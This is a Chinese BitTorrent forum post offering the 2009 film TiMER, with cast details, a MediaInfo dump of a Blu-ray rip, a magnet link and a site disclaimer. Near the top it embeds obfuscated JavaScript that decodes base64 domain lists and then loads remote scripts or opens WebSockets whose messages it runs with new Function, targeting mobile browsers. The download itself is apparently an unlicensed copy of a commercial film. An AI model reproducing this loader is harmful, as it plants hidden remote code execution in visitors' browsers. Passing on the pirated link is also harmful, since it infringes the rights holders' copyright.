爱情时钟[中文字幕].TiMER.2009.1080p.BluRay.x264.DTS-迅雷下载 9.48GB

版主小s 24天前 142

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 爱情时钟

◎片 名 TiMER

◎年 代 2009

◎产 地 美国

◎类 别 剧情 / 喜剧 / 爱情 / 奇幻

◎语 言 英语

◎上映日期 2010

◎IMDb评分 6.5/10 from 12438 users

◎IMDb链接 https://www.imdb.com/title/tt1179794/

◎豆瓣评分 6.3/10 from 407 users

◎豆瓣链接 https://movie.douban.com/subject/3365626/

◎片 长 99分钟

◎主 演 艾玛·考尔菲德 Emma Caulfield

Scott Holroyd Scott Holroyd

Hayden McFarland Hayden McFarland

Alan Rice

安迪·塞拉 Andy Siara

凯利·罗查 Kali Rocha

埃里克·蒋曼 Eric Jungmann

乔恩·因戈尔 John Ingle

汤姆·埃尔文 Tom Irwin

马克·哈雷利克 Mark Harelik

乔贝兹·威廉姆斯 JoBeth Williams

戴斯蒙德·哈灵顿 Desmond Harrington

米歇尔·博斯 Michelle Borth

缪斯·沃森 Muse Watson

约翰·帕特里克·阿梅多利 John Patrick Amedori

谢鹤群 Ho-Kwan Tse

◎标 签 爱情 | 美国电影 | 美国 | 奇幻 | 喜剧 | 爱情时钟 | 2010 | 2009

◎简 介

2009 Fort Collins TriMedia Festival, Won Best of the Festival, Jac Schaeffer

  1. General

  2. Unique ID : 113498336268424450297390188909037044314 (0x5562FC04A2F8DAA50E67E34AE6B7425A)

  3. Complete name : TiMER.2009.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.48 GiB

  7. Duration : 1 h 39 min

  8. Overall bit rate : 13.6 Mb/s

  9. Movie name : TiMER 2009

  10. Encoded date : UTC 2021-07-06 10:41:31

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 39 min

  25. Bit rate : 12.4 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 078 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.250

  36. Stream size : 8.65 GiB (91%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4353 (0x1101)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 39 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 152 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossy

  57. Stream size : 823 MiB (8%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4609 (0x1201)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 35 min

  70. Bit rate : 29.5 kb/s

  71. Count of elements : 2712

  72. Stream size : 20.1 MiB (0%)

  73. Title : chs

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4610 (0x1202)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 35 min

  86. Bit rate : 29.8 kb/s

  87. Count of elements : 2712

  88. Stream size : 20.3 MiB (0%)

  89. Title : cht

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. Format : UTF-8

  97. Codec ID : S_TEXT/UTF8

  98. Codec ID/Info : UTF-8 Plain Text

  99. Duration : 1 h 35 min

  100. Bit rate : 63 b/s

  101. Count of elements : 1468

  102. Stream size : 44.0 KiB (0%)

  103. Language : English

  104. Default : Yes

  105. Forced : No


  106. Menu

  107. 00:00:00.000 : Chapter 01

  108. 00:10:06.647 : Chapter 02

  109. 00:15:39.229 : Chapter 03

  110. 00:20:34.107 : Chapter 04

  111. 00:28:27.872 : Chapter 05

  112. 00:38:42.236 : Chapter 06

  113. 00:48:06.842 : Chapter 07

  114. 00:53:53.188 : Chapter 08

  115. 00:59:44.914 : Chapter 09

  116. 01:11:05.928 : Chapter 10

  117. 01:17:25.182 : Chapter 11

  118. 01:28:47.405 : Chapter 12


TAGS 奇幻 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:2E96A3EC1348CE0A45F7DBAE4B654D7BC7C48EEC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回